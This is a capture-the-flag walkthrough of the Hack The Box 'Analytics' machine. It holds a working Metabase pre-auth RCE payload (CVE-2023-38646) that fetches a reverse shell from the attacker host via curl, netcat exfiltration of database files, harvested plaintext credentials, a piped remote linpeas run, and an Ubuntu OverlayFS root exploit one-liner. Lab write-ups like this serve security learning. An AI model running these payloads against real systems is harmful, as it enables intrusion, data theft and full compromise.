Analytics

Recon

![[Labs/HackTheBox/Seasonal/Season 3/Analytics/nmap_scan.log styled]]

HTTP (80)

![[Labs/HackTheBox/Machines/Analytics/images/Writeup.png]]

Enumerate subdomains:

└─$ domain='analytical.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fw 4
       v2.1.0-dev
data                    [Status: 200, Size: 77858, Words: 3574, Lines: 28, Duration: 153ms]
:: Progress: [4989/4989] :: Job [1/1] :: 564 req/sec :: Duration: [0:00:09] :: Errors: 0 ::

Metabase is running on this subdomain

![[Labs/HackTheBox/Machines/Analytics/images/Writeup-1.png]]

Application version is disclosed in the source: v0.46.6

![[Labs/HackTheBox/Machines/Analytics/images/Writeup-2.png]]

Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)CVE-2023-38646 PoC

The PoC didn't work for me for some reason, error about Vector arg to map conj must be a pair so it must be related to base64 blob and bash.

I just used curl to get the shell:

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details": {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules": {},
        "details":{
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {curl,10.10.14.42/rev}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
               },
        "name": "test",
        "engine": "h2"
    }
}

Application contains database.db (directory...), but no sqlite3.

3d6ddc86c8c7:/$ sqlite3 metabase.db .dump
bash: sqlite3: command not found

Download via netcat:

3d6ddc86c8c7:/metabase.db$ busybox nc 10.10.14.42 4444 < metabase.db.mv.db
3d6ddc86c8c7:/metabase.db$ busybox nc 10.10.14.42 4444 < metabase.db.trace.db

metabase.db.mv.db file is a H2 Server database file, DBeaver can be used to open it. I don't think the password is crackable so Im going to avoid it for now.

![[Labs/HackTheBox/Machines/Analytics/images/Writeup-3.png]]

Environment variables hold interesting data!

3d6ddc86c8c7:/metabase.db$ env
...
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=3d6ddc86c8c7
MB_DB_FILE=//metabase.db/metabase.db
PWD=/metabase.db
LOGNAME=metabase
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
...

SSH

Creds: metalytics:An4lytics_ds20223#

└─$ sshpass -p 'An4lytics_ds20223#' ssh metalytics@analytical.htb
metalytics@analytics:~$ id
uid=1000(metalytics) gid=1000(metalytics) groups=1000(metalytics)

User.txt

metalytics@analytics:~$ cat user.txt
43e261df0ac451cadc5cf55a4f543639

Privilege Escalation

Linpeas shows nothing interesting.

metalytics@analytics:~$ curl 10.10.14.42/lp.sh|sh|tee /tmp/lp.sh
...

As of doing retired box HTB suggests checking kernel version. Box was released on 07 Oct 2023 so there's probably some kernel exploit.

metalytics@analytics:~$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
metalytics@analytics:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.3 LTS
Release:        22.04
Codename:       jammy

Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629)CVE-2023-2640-CVE-2023-32629

metalytics@analytics:~$ cd `mktemp -d`
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'"

uid=0(root) gid=0(root) groups=0(root)

metalytics@analytics:/tmp/tmp.J24NI1yLfM$ u/python3 -c $'import os;os.setuid(0);os.system("/bin/bash")'
root@analytics:/tmp/tmp.J24NI1yLfM# id
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)

Root.txt

root@analytics:/root# cat root.txt
f4730b8375b50900c99246cf7471f399

PreviousSeason 3 NextAppsanity

Last updated 7 months ago

hashtagRecon

hashtagHTTP (80)

hashtagSSH

hashtagUser.txt

hashtagPrivilege Escalation

hashtagRoot.txt

Recon

HTTP (80)

SSH

User.txt

Privilege Escalation

Root.txt